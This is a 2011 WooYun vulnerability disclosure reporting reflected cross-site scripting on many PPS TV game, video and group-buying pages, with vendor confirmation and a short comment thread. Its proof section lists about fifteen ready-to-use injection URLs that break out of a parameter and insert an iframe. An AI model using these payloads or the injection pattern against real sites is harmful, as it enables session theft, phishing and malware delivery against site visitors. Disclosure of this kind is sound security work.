PPS网络电视N多XSS站

漏洞概要

缺陷编号:WooYun-2011-03014

漏洞标题:PPS网络电视N多XSS站

相关厂商:PPS网络电视

漏洞作者:lotte

提交时间:2011-10-16 10:27

公开时间:2011-11-15 10:28

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2011-10-16: 细节已通知厂商并且等待厂商处理中
2011-10-16: 厂商已经确认,细节仅向厂商公开
2011-10-26: 细节向核心白帽子及相关领域专家公开
2011-11-05: 细节向普通白帽子公开
2011-11-15: 细节向实习白帽子公开
2011-11-15: 细节向公众公开

简要描述:

可执行恶意代码,挂马盗号蠕虫病毒攻击!!!

详细说明:

可执行恶意代码,挂马盗号蠕虫病毒攻击!!!

漏洞证明:

IE9神魔遮天 http://game.pps.tv/register.php?game_id=176&gtype=3760&cf=wwwuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E凡人修真 http://game.pps.tv/load/frxz_login.php?url=http://togame.pps.tv/togame_frxz.php?type=1833uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E水浒传 http://game.pps.tv/shuihuzhuan_reg_load.php?cf=test&uid=1uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E网页游戏大全 http://game.pps.tv/login_new.php?preurl=http%3A%2F%2Ftogame.pps.tv%2Ftogame_smzt.php%3Ftype%3D3760uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E洪荒神话 http://game.pps.tv/load/game_login.php?url=http://togame.pps.tv/togame_hhsh.php?type=2869&game_id=158uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3Ehttp://game.pps.tv/chengjisihan_login.php?NextUrl=http://ly.reg.70yx.com/Index.aspxuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E搜索_PPS网络电视http://post.gameguide.youxi.pps.tv/index.php?c=outer_hall&m=outer_search_error&keyword=uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E过滤不严格 http://v.pps.tv/ugc/list.php?classid=30&order=addtime&time=weekuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3EPPS团购 http://tuan.pps.tv/index.php?c=tuangou&m=index&cat_id=1uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E天地英雄 http://game.pps.tv/load/tdyx_login.php?url=http://togame.pps.tv/togame_tdyx.php?type=2664uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E明朝时代 http://game.pps.tv/load/mcsd_login.php?url=http://togame.pps.tv/togame_mcsd.php?type=671uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E千军破 http://game.pps.tv/load/qjp_login.php?url=http://togame.pps.tv/togame_qjp.php?type=2558uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E斗法休闲 http://game.pps.tv/load/dfxxz_login.php?url=http://togame.pps.tv/togame_dfxx.php?type=2411uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E食神小当家 http://game.pps.tv/load/ssxdj_login.php?url=http://togame.pps.tv/togame_xdj.php?type=2303uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E

修复方案:

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2011-10-16 10:53

厂商回复:

感谢lotte,[email protected],赠送pps抱枕一个。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 lotte 白帽子 | Rank:25 漏洞数:8)

    邮件发送了!!!

  2. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

  3. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    哈哈。这个有味道。